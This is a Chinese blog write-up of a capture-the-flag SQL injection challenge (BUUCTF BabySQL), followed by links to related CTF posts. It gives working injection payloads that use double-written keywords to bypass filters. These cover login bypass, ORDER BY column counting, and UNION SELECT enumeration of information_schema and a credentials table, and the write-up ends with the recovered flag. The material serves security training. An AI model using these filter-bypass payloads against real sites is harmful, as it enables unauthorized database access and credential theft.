BUUCTF [极客大挑战 2019]BabySQL

已于 2022-04-03 10:58:37 修改
阅读量833 收藏
点赞数
分类专栏: 第二周刷题记录3.14-3.20 文章标签: sql 数据库 其他
于 2022-03-19 10:44:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/123590008
版权

进入环境是一个登入页面,提示有过滤

通过测试,发现万能密码登录过滤啦or,用||替代

然后开始sql注入爆数据库

先爆字段数,or和by被过滤了要双写绕过

admin' oorrder bbyy 1#
密码随便

 3的时候正常回显,4的时候报错,说明表里有3个字段

然后看回显位置

这里union,select都被过滤,双写绕过,先看看回显

check.php?username=admin&password=' ununionion seselectlect 1,2,3 %23

 爆数据库:geek

爆数据表:

check.php?username=admin&password=' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek' %23

 爆字段:

查数据:

check.php?username=admin&password=' ununionion seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom geek.b4bsql %23

Your password is '1cl4yi_want_to_play_2077,2sqlsql_injection_is_so_fun,3porndo_you_know_pornhub,4gitgithub_is_different_from_pornhub,5Stopyou_found_flag_so_stop,6badguyi_told_you_to_stop,7hackerhack_by_cl4y,8flagflag{bb35b99f-fe37-4f47-9c77-9d8c45395267}'

就出来啦

这题很多双写绕过

白塔河冲浪手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1377
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
BUUCTF-[极客挑战 2019]PHP1
Monica的博客
09-27 3657
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
Secret File
weixin_46580614的博客
07-16 146
打开之后的界面是 审查元素 之后有个跳转页面 直接跳转 然后 真狗 继续跳转 结果没看明白 尝试bp抓包试一下 发现 有东西 看到代码 进行分析 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2655
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
[极客挑战 2019]BabySQL
weixin_41571993的博客
10-04 671
靶场练习
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
buuctf [极客挑战 2019]BabySQL
qq_52671379的博客
05-10 281
buuctf [极客挑战 2019]BabySQL
[GXYCTF2019]BabySQli 1
m0_62879498的博客
04-13 3888
[GXYCTF2019]BabySQli 1 我们先判断注入点,发现注入点在 用户名('or 1=1-- q) 发现 or 被过滤掉,我们尝试使用大小写绕过,成功。 判断字段数:'OR 1=1 order by 1 – q 使用联合查询 'union select 1,2,3-- q 发现没有直接将回显返回出来 理论上来说,联合查询是不可以使用的 同时,这道题是会有返回了错误信息,是不是感觉报错注入在向自己招手? 想尝试的童鞋可以故意使用错误的sql语句看是否有错误信息回显 但痛苦的是,在本关过滤掉
极客挑战2019babysql
kindyyy的博客
04-08 1230
我也是参考了大佬的wp才会做的题目..... 大佬博客:[极客挑战 2019]BabySQL - 云千 - 博客园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。 大概就是这样。先看题目吧: ...
BUUCTFBabySQL[极客挑战 2019]
金 帛的博客
06-11 434
BUUCTF记录贴
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 282
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 3790
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [极客挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值